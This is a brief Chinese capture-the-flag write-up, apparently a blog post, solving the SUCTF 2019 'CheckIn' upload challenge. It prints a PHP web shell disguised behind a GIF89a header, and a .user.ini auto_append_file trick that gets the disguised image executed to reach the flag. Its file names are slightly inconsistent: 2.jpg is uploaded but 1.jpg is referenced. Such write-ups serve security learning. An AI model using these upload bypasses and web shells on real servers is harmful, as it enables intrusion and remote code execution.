[SUCTF 2019]CheckIn 1

打开环境
[SUCTF 2019]CheckIn 1
发现好像是个文件上传漏洞发现可以传jgp格式的图
但是传被过滤的的就会出现
[SUCTF 2019]CheckIn 1
这里就要了解一个函数
exif_imagetype
函数简介
其实就是一个类型的比较
所以这里和其他文件上传设置的黑白名单没两样
可以直接魔术头绕过就行
然后进过测试发现文件名带ph的被过滤了所以用phtm后缀l解析不行了
文件内容有<?的被过滤了
所以这里这样绕过
2.jpg

GIF89a
<script language="php"> eval($_POST[1]);</script>

[SUCTF 2019]CheckIn 1
上传成功了 但是没有被解析 然后这块的又没有文件包含漏洞,所以不容易被解析 所以不能用工具链接
这里就要了解另一个知识点了
神秘的.user.ini文件
先配置.user.ini再上传在它目录下进行解析
.user.ini

GIF89a
auto_append_file=1.jpg
 

[SUCTF 2019]CheckIn 1

然后再上传木马
[SUCTF 2019]CheckIn 1
工具链接在根目录寻找flag
也能在木马语句中直接抓flag
[SUCTF 2019]CheckIn 1
这样直接访问文件位置得到flag
[SUCTF 2019]CheckIn 1
希望这篇文章能帮到你!

上一篇:策略模式之工厂形式


下一篇:关于项目部署,偶尔出现访问本地证书拒绝访问或空指针情况